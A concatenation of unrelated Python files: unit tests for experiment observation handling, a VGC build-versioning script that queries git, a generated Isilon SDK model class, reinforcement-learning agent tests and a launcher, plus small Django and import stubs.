self.assertEqual(od1, od2)
self.assertNotEqual(od1, od3)
self.assertFalse(od1 == 1)
def testObservation(self):
obs = Observation(
features=ObservationFeatures(parameters={"x": 20}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
self.assertEqual(obs.features, ObservationFeatures(parameters={"x": 20}))
self.assertEqual(
obs.data,
ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
)
self.assertEqual(obs.arm_name, "0_0")
obs2 = Observation(
features=ObservationFeatures(parameters={"x": 20}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
self.assertEqual(obs, obs2)
obs3 = Observation(
features=ObservationFeatures(parameters={"x": 10}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
self.assertNotEqual(obs, obs3)
self.assertNotEqual(obs, 1)
def testObservationsFromData(self):
truth = [
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
},
{
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b"},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
},
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
},
]
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for obs in truth
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for obs in truth
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(truth)[
["arm_name", "trial_index", "mean", "sem", "metric_name"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
self.assertEqual(len(observations), 2)
# Get them in the order we want for tests below
if observations[0].features.parameters["x"] == 1:
observations.reverse()
obsd_truth = {
"metric_names": [["a", "b"], ["a"]],
"means": [np.array([2.0, 4.0]), np.array([3])],
"covariance": [np.diag([4.0, 16.0]), np.array([[9.0]])],
}
cname_truth = ["0_0", "0_1"]
for i, obs in enumerate(observations):
self.assertEqual(obs.features.parameters, truth[i]["parameters"])
self.assertEqual(obs.features.trial_index, truth[i]["trial_index"])
self.assertEqual(obs.data.metric_names, obsd_truth["metric_names"][i])
self.assertTrue(np.array_equal(obs.data.means, obsd_truth["means"][i]))
self.assertTrue(
np.array_equal(obs.data.covariance, obsd_truth["covariance"][i])
)
self.assertEqual(obs.arm_name, cname_truth[i])
def testObservationsFromDataWithFidelities(self):
truth = {
0.5: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
"fidelities": json.dumps({"z": 0.5}),
"updated_parameters": {"x": 0, "y": "a", "z": 0.5},
"mean_t": np.array([2.0]),
"covariance_t": np.array([[4.0]]),
},
0.25: {
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b", "z": 0.5},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"fidelities": json.dumps({"z": 0.25}),
"updated_parameters": {"x": 1, "y": "b", "z": 0.25},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
},
1: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"fidelities": json.dumps({"z": 1}),
"updated_parameters": {"x": 0, "y": "a", "z": 1},
"mean_t": np.array([4.0]),
"covariance_t": np.array([[16.0]]),
},
}
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for _, obs in truth.items()
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for _, obs in truth.items()
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(list(truth.values()))[
["arm_name", "trial_index", "mean", "sem", "metric_name", "fidelities"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
self.assertEqual(len(observations), 3)
for obs in observations:
t = truth[obs.features.parameters["z"]]
self.assertEqual(obs.features.parameters, t["updated_parameters"])
self.assertEqual(obs.features.trial_index, t["trial_index"])
self.assertEqual(obs.data.metric_names, [t["metric_name"]])
self.assertTrue(np.array_equal(obs.data.means, t["mean_t"]))
self.assertTrue(np.array_equal(obs.data.covariance, t["covariance_t"]))
self.assertEqual(obs.arm_name, t["arm_name"])
def testObservationsFromMapData(self):
truth = {
0.5: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
"updated_parameters": {"x": 0, "y": "a", "z": 0.5},
"mean_t": np.array([2.0]),
"covariance_t": np.array([[4.0]]),
"z": 0.5,
"timestamp": 50,
},
0.25: {
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b", "z": 0.5},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"updated_parameters": {"x": 1, "y": "b", "z": 0.25},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
"z": 0.25,
"timestamp": 25,
},
1: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"updated_parameters": {"x": 0, "y": "a", "z": 1},
"mean_t": np.array([4.0]),
"covariance_t": np.array([[16.0]]),
"z": 1,
"timestamp": 100,
},
}
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for _, obs in truth.items()
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for _, obs in truth.items()
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(list(truth.values()))[
["arm_name", "trial_index", "mean", "sem", "metric_name", "z", "timestamp"]
]
data = MapData(
df=df,
map_key_infos=[
MapKeyInfo(key="z", default_value=0.0),
MapKeyInfo(key="timestamp", default_value=0.0),
],
)
observations = observations_from_map_data(experiment, data)
self.assertEqual(len(observations), 3)
for obs in observations:
t = truth[obs.features.parameters["z"]]
self.assertEqual(obs.features.parameters, t["updated_parameters"])
self.assertEqual(obs.features.trial_index, t["trial_index"])
self.assertEqual(obs.data.metric_names, [t["metric_name"]])
self.assertTrue(np.array_equal(obs.data.means, t["mean_t"]))
self.assertTrue(np.array_equal(obs.data.covariance, t["covariance_t"]))
self.assertEqual(obs.arm_name, t["arm_name"])
self.assertEqual(obs.features.metadata, {"timestamp": t["timestamp"]})
def testObservationsFromDataAbandoned(self):
truth = {
0.5: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 2.0,
"sem": 2.0,
"trial_index": 0,
"metric_name": "a",
"updated_parameters": {"x": 0, "y": "a", "z": 0.5},
"mean_t": np.array([2.0]),
"covariance_t": np.array([[4.0]]),
"z": 0.5,
"timestamp": 50,
},
1: {
"arm_name": "1_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"updated_parameters": {"x": 0, "y": "a", "z": 1},
"mean_t": np.array([4.0]),
"covariance_t": np.array([[16.0]]),
"z": 1,
"timestamp": 100,
},
0.25: {
"arm_name": "2_0",
"parameters": {"x": 1, "y": "a", "z": 0.5},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"updated_parameters": {"x": 1, "y": "b", "z": 0.25},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
"z": 0.25,
"timestamp": 25,
},
0.75: {
"arm_name": "2_1",
"parameters": {"x": 1, "y": "b", "z": 0.75},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"updated_parameters": {"x": 1, "y": "b", "z": 0.75},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
"z": 0.75,
"timestamp": 25,
},
}
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for _, obs in truth.items()
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: (
Trial(experiment, GeneratorRun(arms=[arms[obs["arm_name"]]]))
)
for _, obs in list(truth.items())[:-1]
if not obs["arm_name"].startswith("2")
}
batch = BatchTrial(experiment, GeneratorRun(arms=[arms["2_0"], arms["2_1"]]))
trials.update({2: batch})
trials.get(1).mark_abandoned()
trials.get(2).mark_arm_abandoned(arm_name="2_1")
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(list(truth.values()))[
["arm_name", "trial_index", "mean", "sem", "metric_name"]
]
data = Data(df=df)
# 1 arm is abandoned and 1 trial is abandoned, so only 2 observations should be
# included.
obs_no_abandoned = observations_from_data(experiment, data)
self.assertEqual(len(obs_no_abandoned), 2)
# 1 arm is abandoned and 1 trial is abandoned, so only 2 observations should be
# included.
obs_with_abandoned = observations_from_data(
experiment, data, include_abandoned=True
)
self.assertEqual(len(obs_with_abandoned), 4)
def testObservationsFromDataWithSomeMissingTimes(self):
truth = [
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
"start_time": 0,
},
{
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b"},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"start_time": 0,
},
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"start_time": None,
},
{
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b"},
"mean": 5.0,
"sem": 5.0,
"trial_index": 2,
"metric_name": "b",
"start_time": None,
},
]
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for obs in truth
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for obs in truth
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(truth)[
["arm_name", "trial_index", "mean", "sem", "metric_name", "start_time"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
self.assertEqual(len(observations), 2)
# Get them in the order we want for tests below
if observations[0].features.parameters["x"] == 1:
observations.reverse()
obsd_truth = {
"metric_names": [["a", "b"], ["a", "b"]],
"means": [np.array([2.0, 4.0]), np.array([3.0, 5.0])],
"covariance": [np.diag([4.0, 16.0]), np.diag([9.0, 25.0])],
}
cname_truth = ["0_0", "0_1"]
for i, obs in enumerate(observations):
self.assertEqual(obs.features.parameters, truth[i]["parameters"])
self.assertEqual(obs.features.trial_index, truth[i]["trial_index"])
self.assertEqual(obs.data.metric_names, obsd_truth["metric_names"][i])
self.assertTrue(np.array_equal(obs.data.means, obsd_truth["means"][i]))
self.assertTrue(
np.array_equal(obs.data.covariance, obsd_truth["covariance"][i])
)
self.assertEqual(obs.arm_name, cname_truth[i])
def testSeparateObservations(self):
obs = Observation(
features=ObservationFeatures(parameters={"x": 20}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
obs_feats, obs_data = separate_observations(observations=[obs])
self.assertEqual(obs.features, ObservationFeatures(parameters={"x": 20}))
self.assertEqual(
obs.data,
ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
)
obs_feats, obs_data = separate_observations(observations=[obs], copy=True)
self.assertEqual(obs.features, ObservationFeatures(parameters={"x": 20}))
self.assertEqual(
obs.data,
ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
)
def testObservationsWithCandidateMetadata(self):
SOME_METADATA_KEY = "metadatum"
truth = [
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 2.0,
"sem": 2.0,
"trial_index": 0,
"metric_name": "a",
},
{
"arm_name": "1_0",
"parameters": {"x": 1, "y": "b"},
"mean": 3.0,
"sem": 3.0,
"trial_index": 1,
"metric_name": "a",
},
]
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for obs in truth
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment,
GeneratorRun(
arms=[arms[obs["arm_name"]]],
candidate_metadata_by_arm_signature={
arms[obs["arm_name"]].signature: {
SOME_METADATA_KEY: f"value_{obs['trial_index']}"
}
},
),
)
for obs in truth
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(truth)[
["arm_name", "trial_index", "mean", "sem", "metric_name"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
for observation in observations:
self.assertEqual(
observation.features.metadata.get(SOME_METADATA_KEY),
f"value_{observation.features.trial_index}",
)
|
#!/usr/bin/env python3
#
# Generates a file called version.txt with versioning info. Example:
#
# manufacturer=VGC Software
# suite=VGC
# versionType=alpha
# versionMajor=
# versionMinor=
# versionName=Alpha 2019-07-10
# commitRepository=https://github.com/vgc/vgc
# commitBranch=master
# commitHash=09793d56c9b4046e4507b5d13f06cd1772ce8cab
# commitDate=2019-07-10
# commitTime=12:16:35
# commitIndex=0
# buildCompiler=MSVC
# buildCompilerVersion=19.16.27031.1
# buildArchitecture=x64
# buildConfig=Release
# buildDate=2019-07-15
# buildTime=09:11:12
#
# We detail below some of the less obvious values.
#
# Suite
# -----
#
# We call a "suite" a group of related apps which are designed to be installed
# together and share resources, such as DLLs, images, fonts, etc.
#
# For example, "Adobe CC" and "Open Office" are suites. In our case, we are
# developing a suite named "VGC". You can change this name if you are forking
# the project.
#
# Version type
# ------------
#
# We call "version type" one of the following: "stable", "beta", and "alpha".
#
# Builds of VGC with different version types are considered to be different
# programs, and are installed side-by-side in different folders, e.g.:
#
# - C:/Program Files/VGC/
# - C:/Program Files/VGC Beta/
# - C:/Program Files/VGC Alpha/
#
# Note that other things determine whether different versions can be installed
# side-by-side, such as the "upgrade policy". See vgc/tools/windows/wix.py for
# more details.
#
# Version number (major and minor)
# --------------------------------
#
# Alpha versions don't have any version number associated with them. Both
# versionMajor and versionMinor are empty strings.
#
# Beta versions only have a major version number associated with them, e.g.,
# "2020". versionMinor is an empty string.
#
# Stable versions have both a major and minor version number, e.g., 2020.0.
#
# Commit branch
# -------------
#
# This is the Git branch this commit belongs to.
#
# But let's clarify this because it's not as obvious as it seems. In theory,
# in Git, a commit doesn't "belong to" any branch. A commit is just a node of
# a directed acyclic graph, and a branch is just a reference to one such node.
# In other words, a branch is not a set of commits, it's just one commit. Most
# commits don't have any branch associated with them, as far as Git is
# concerned.
#
# However, in practice, and regardless of how Git works internally, most
# projects are following a branching model to organize development. In such
# models, the word "branch" usually does not mean a reference to a single
# commit, but rather means the "whole branch" more similarly to what a branch
# means for real living trees. This is what we mean by "commit branch", and it
# is quite well defined, even though git isn't aware a it. Here is our
# definition:
#
# For any given commit, we define its "commit branch" to be the name of the
# checked out branch when this commit was created.
#
# Indeed, when a commit is first created, there is one and only one branch
# that references this commit, which is the branch currently checked out. This
# is what we call the commit branch, and it never changes. Let's take the
# following sequence of commands as examples:
#
# - git checkout master:
# HEAD is a commit (let's call it c1) belonging to the master branch.
#
# --o--o c1 (master)
#
# - git checkout -b 2020:
# A new release branch is created, but for now it still references the same
# commit c1, belonging to master.
#
# --o--o c1 (master, 2020)
#
# - bump_version.sh && git commit:
# Now, a new commit is created, let call it c2. This new commit belongs to
# the branch "2020".
#
# o c2 (2020)
# /
# --o--o c1 (master)
#
# - git checkout master && git checkout -b gh62:
# We've created a new topic branch "gh62" off master, say, to fix a bug.
# The new topic branch still points to c1, belonging to master.
#
# o c2 (2020)
# /
# --o--o c1 (master, gh62)
#
# - fix_bug.sh && git commit:
# A new commit is created, let call it c3, fixing the bug. This new commit
# belongs to the branch "gh62".
#
# o c2 (2020)
# /
# --o--o c1 (master)
# \
# o c3 (gh62)
#
# - fix_bug_2.sh && git commit:
# A new commit is created, let call it c4, improving the bug fix based on
# feedback from code review. This new commit belongs to the branch "gh62".
#
# o c2 (2020)
# /
# --o--o c1 (master)
# \
# o--o c4 (gh62)
#
# - git checkout master && git merge --squash gh62:
# The bug-fix is squash-merged to master. This creates a new commit c5,
# containing all the changes introduced in gh62. c5 belongs to master.
#
# o c2 (2020)
# /
# --o--o--o c5 (master)
# \
# o--o c4 (gh62)
#
# (Alternatively, one could also use "git merge --no-ff gh62", which would
# also create a new commit c5 belonging to master)
#
# - git branch -D gh62:
# The branch gh62 is deleted. The commits c3 and c4 are now orphaned and
# can be considered deleted.
#
# o c2 (2020)
# /
# --o--o--o c5 (master)
# \
# ( o--o c4 ) <- orphaned
#
# - git checkout 2020 && git cherry-pick c5:
# The bug-fix is cherry-picked for inclusion in the 2020 release. This
# creates a new commit c6, containing all the changes introduced by c5
# (originally introduced by gh62). c6 belongs to 2020.
#
# o--o c6 (2020)
# /
# --o--o--o c5 (master)
# \
# ( o--o c4 ) <- orphaned
#
# In summary, any commit can be attributed a "commit branch":
#
# master: c1, c5
# 2020: c2, c6
# gh62: c3, c4 (now orphaned)
#
# Commit index
# ------------
#
# Count how many ancestors of this commit have the same commitDate as this
# commit. This makes it possible to uniquely identify a commit in a
# human-friendly way:
#
# commitBranch.commitDate.commitIndex (example: master.2019-07-10.0)
#
# However, note that topic branches are short-lived and eventually deleted, so
# for commits on a topic branch, this can only be a short-term identifier and
# does not entirely replace the commit hash.
#
from datetime import datetime, timezone
from pathlib import Path
import argparse
import subprocess
# Converts a date given as a string in a given format as a UTC datetime
# object.
#
# Example:
# dateformat = '%Y-%m-%d %H:%M:%S %z'
# datestring = '2019-06-23 18:00:45 -0800'
# d = utcdatetime(datestring, dateformat) # -> datetime(2019, 6, 24, 2, 0, 45, tzinfo=utc)
# print(d) # -> "2019-06-24 02:00:45+00:00"
#
def utcdatetime(datestring, dateformat):
return datetime.strptime(datestring, dateformat).astimezone(timezone.utc)
# Script entry point.
#
if __name__ == "__main__":
# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("srcDir")
parser.add_argument("buildDir")
parser.add_argument("gitExecutable")
parser.add_argument("manufacturer")
parser.add_argument("suite")
parser.add_argument("versionType")
parser.add_argument("versionMajor")
parser.add_argument("versionMinor")
parser.add_argument("commitRepository")
parser.add_argument("commitBranch")
parser.add_argument("buildCompiler")
parser.add_argument("buildCompilerVersion")
parser.add_argument("buildArchitecture")
parser.add_argument("buildConfig")
args = parser.parse_args()
# Import arguments into the global namespace.
# This allows to more simply write `foo` instead of `args.foo`.
globals().update(vars(args))
# The resulting string to write to version.txt
res = ""
# Basic version info
res += "manufacturer=" + manufacturer + "\n"
res += "suite=" + suite + "\n"
res += "versionType=" + versionType + "\n"
res += "versionMajor=" + versionMajor + "\n"
res += "versionMinor=" + versionMinor + "\n"
# Get commit info
commitHash = ""
commitDate = ""
commitTime = ""
commitIndex = ""
if gitExecutable:
# Branch
if not commitBranch:
p = subprocess.run(
[gitExecutable, "rev-parse", "--abbrev-ref", "HEAD"],
cwd=srcDir, encoding='utf-8', stdout=subprocess.PIPE)
if p.returncode == 0:
lines = p.stdout.splitlines()
if len(lines) > 0:
commitBranch = lines[0]
# Date
p = subprocess.run(
[gitExecutable, "rev-parse", "HEAD"],
cwd=srcDir, encoding='utf-8', stdout=subprocess.PIPE)
if p.returncode == 0:
lines = p.stdout.splitlines()
if len(lines) > 0:
commitHash = lines[0]
# Date, time, and index
p = subprocess.run(
[gitExecutable, "--no-pager", "log", "-100", "--pretty=format:%ci"],
cwd=srcDir, encoding='utf-8', stdout=subprocess.PIPE)
if p.returncode == 0:
lines = p.stdout.splitlines()
if len(lines) > 0:
dateformat = '%Y-%m-%d %H:%M:%S %z'
datetimes = [utcdatetime(s, dateformat) for s in lines]
isodates = [d.date().isoformat() for d in datetimes]
commitDate = isodates[0]
commitTime = datetimes[0].time().isoformat()
commitIndexInt = isodates.count(commitDate) - 1
commitIndex = str(commitIndexInt)
# Human-readable version name
if versionType == "stable":
versionName = versionMajor
if int(versionMinor) > 0:
versionName += "." + versionMinor
else:
if versionType == "beta":
versionName = versionMajor + " Beta"
else:
versionName = "Alpha"
hasCommitInfo = commitBranch and commitDate and commitIndex
if hasCommitInfo:
if ((versionType == "beta" and commitBranch != versionMajor) or
(versionType == "alpha" and commitBranch != "master")):
versionName += "-" + commitBranch
versionName += " " + commitDate + "." + commitIndex
res += "versionName=" + versionName + "\n"
# Note: installFamily, installVersion, and installHumanVersion are not in
# the version.txt file since they depend on the upgradePolicy, which we
# cannot know at this time. See vgc/tools/windows/wix.py for details.
# Write commit info
res += "commitRepository=" + commitRepository + "\n"
res += "commitBranch=" + commitBranch + "\n"
res += "commitHash=" + commitHash + "\n"
res += "commitDate=" + commitDate + "\n"
res += "commitTime=" + commitTime + "\n"
res += "commitIndex=" + commitIndex + "\n"
# Build info
now = datetime.now(timezone.utc)
res += "buildCompiler=" + buildCompiler + "\n"
res += "buildCompilerVersion=" + buildCompilerVersion + "\n"
res += "buildArchitecture=" + buildArchitecture + "\n"
res += "buildConfig=" + buildConfig + "\n"
res += "buildDate=" + now.date().isoformat() + "\n"
res += "buildTime=" + now.time().isoformat(timespec="seconds") + "\n"
# Write to file
versionDir = Path(buildDir) / buildConfig / "resources" / "core"
versionDir.mkdir(parents=True, exist_ok=True)
versionPath = versionDir / "version.txt"
versionPath.write_text(res)
# Print version info to console
print(f"\n{versionPath}:\n{res}", flush=True)
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 10
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from isi_sdk_9_0_0.models.mapping_users_rules_parameters import MappingUsersRulesParameters # noqa: F401,E501
from isi_sdk_9_0_0.models.mapping_users_rules_rule_extended import MappingUsersRulesRuleExtended # noqa: F401,E501
class MappingUsersRulesExtended(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'parameters': 'MappingUsersRulesParameters',
'rules': 'list[MappingUsersRulesRuleExtended]'
}
attribute_map = {
'parameters': 'parameters',
'rules': 'rules'
}
def __init__(self, parameters=None, rules=None): # noqa: E501
"""MappingUsersRulesExtended - a model defined in Swagger""" # noqa: E501
self._parameters = None
self._rules = None
self.discriminator = None
if parameters is not None:
self.parameters = parameters
if rules is not None:
self.rules = rules
@property
def parameters(self):
"""Gets the parameters of this MappingUsersRulesExtended. # noqa: E501
Specifies the default UNIX user information that can be applied if the final credentials do not have valid UID and GID information. # noqa: E501
:return: The parameters of this MappingUsersRulesExtended. # noqa: E501
:rtype: MappingUsersRulesParameters
"""
return self._parameters
@parameters.setter
def parameters(self, parameters):
"""Sets the parameters of this MappingUsersRulesExtended.
Specifies the default UNIX user information that can be applied if the final credentials do not have valid UID and GID information. # noqa: E501
:param parameters: The parameters of this MappingUsersRulesExtended. # noqa: E501
:type: MappingUsersRulesParameters
"""
self._parameters = parameters
@property
def rules(self):
"""Gets the rules of this MappingUsersRulesExtended. # noqa: E501
Specifies the list of user mapping rules. # noqa: E501
:return: The rules of this MappingUsersRulesExtended. # noqa: E501
:rtype: list[MappingUsersRulesRuleExtended]
"""
return self._rules
@rules.setter
def rules(self, rules):
"""Sets the rules of this MappingUsersRulesExtended.
Specifies the list of user mapping rules. # noqa: E501
:param rules: The rules of this MappingUsersRulesExtended. # noqa: E501
:type: list[MappingUsersRulesRuleExtended]
"""
self._rules = rules
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, MappingUsersRulesExtended):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
# Copyright 2021 The Bellman Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import tensorflow as tf
from tf_agents.drivers.tf_driver import TFDriver
from tf_agents.environments import suite_gym
from tf_agents.environments.tf_py_environment import TFPyEnvironment
from tf_agents.policies.random_tf_policy import RandomTFPolicy
from tf_agents.replay_buffers import tf_uniform_replay_buffer
from bellman.agents.background_planning.model_free_agent_types import ModelFreeAgentType
from bellman.agents.components import EnvironmentModelComponents
from bellman.agents.mbpo.mbpo_agent import MbpoAgent
from bellman.environments.transition_model.keras_model.trajectory_sampler_types import (
TrajectorySamplerType,
)
from bellman.environments.transition_model.keras_model.transition_model_types import (
TransitionModelType,
)
from bellman.training.background_planning_agent_trainer import BackgroundPlanningAgentTrainer
from examples.utils.classic_control import MountainCarInitialState, MountainCarReward
@pytest.mark.parametrize("transition_model", [e for e in TransitionModelType])
@pytest.mark.parametrize("trajectory_sampler", [e for e in TrajectorySamplerType])
@pytest.mark.parametrize(
"model_free_agent_type",
[ModelFreeAgentType.Ddpg, ModelFreeAgentType.Sac, ModelFreeAgentType.Td3],
)
def test_all_mepo_variants_work(transition_model, trajectory_sampler, model_free_agent_type):
"""
Mbpo Agent has prespecified transition model, trajectory sampler and model-free agent
types. Here we check that all combinations execute without errors.
"""
# setup the environment and a prespecified model components
py_env = suite_gym.load("MountainCarContinuous-v0")
tf_env = TFPyEnvironment(py_env)
time_step_spec = tf_env.time_step_spec()
observation_spec = tf_env.observation_spec()
action_spec = tf_env.action_spec()
reward_model = MountainCarReward(observation_spec, action_spec)
initial_state_distribution_model = MountainCarInitialState(observation_spec)
# some parameters need to be set correctly
ensemble_size = 2
num_elites = 10
population_size = num_elites + 10
horizon = 1
# define agent, many transition model and trajectory optimiser parameters can
# be arbitrary
agent = MbpoAgent(
time_step_spec,
action_spec,
transition_model,
1,
10,
tf.nn.relu,
ensemble_size,
False,
1,
1,
[tf.keras.callbacks.EarlyStopping(monitor="loss", patience=3)],
reward_model,
initial_state_distribution_model,
trajectory_sampler,
horizon,
population_size,
model_free_agent_type,
1,
10,
tf.nn.relu,
2,
1,
)
# we need some training data
random_policy = RandomTFPolicy(
time_step_spec,
action_spec,
info_spec=agent.collect_policy.info_spec,
)
model_training_buffer = tf_uniform_replay_buffer.TFUniformReplayBuffer(
random_policy.trajectory_spec, batch_size=1, max_length=1000
)
collect_driver_random_policy = TFDriver(
tf_env,
random_policy,
observers=[model_training_buffer.add_batch],
max_steps=10,
disable_tf_function=True,
)
initial_time_step = tf_env.reset()
collect_driver_random_policy.run(initial_time_step)
pets_agent_trainer = BackgroundPlanningAgentTrainer(10, 10)
tf_training_scheduler = pets_agent_trainer.create_training_scheduler(
agent, model_training_buffer
)
training_losses = tf_training_scheduler.maybe_train(tf.constant(10, dtype=tf.int64))
assert EnvironmentModelComponents.TRANSITION in training_losses
# test the agent
collect_driver_planning_policy = TFDriver(
tf_env,
agent.collect_policy,
observers=[model_training_buffer.add_batch],
max_steps=10,
disable_tf_function=True,
)
time_step = tf_env.reset()
collect_driver_planning_policy.run(time_step)
|
from django.conf import settings
from conference.models import Conference
def test_index(admin_client):
"""
Basic test to see if it even works.
"""
url = "/nothing-to-see-here/"
HTTP_OK_200 = 200
Conference.objects.create(
code=settings.CONFERENCE_CONFERENCE,
name=settings.CONFERENCE_CONFERENCE,
)
respnse = admin_client.get(url)
assert respnse.status_code == HTTP_OK_200
|
import sys
import envs
from models.dqn import DQN2013
from argument.argManage import args
from common.utlis import set_seed
from interactor.episodeTrainer import run_GuidenceEnv
sys.path.append('..')
def run():
env = envs.make(args.env_name)
train_agent = DQN2013(env.state_dim, env.action_dim, is_train=True, is_based=False, scope="guidence")
run_GuidenceEnv(env, train_agent)
if __name__ == '__main__':
args.Sum_Oil = 100
args.map_area = 10000
args.env_name = "guidence"
args.experiment_name = "guidence"
set_seed(args.seed)
run()
|
from .friend import *
from .group import *
from .file import *
from .device import *
from .others import *
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
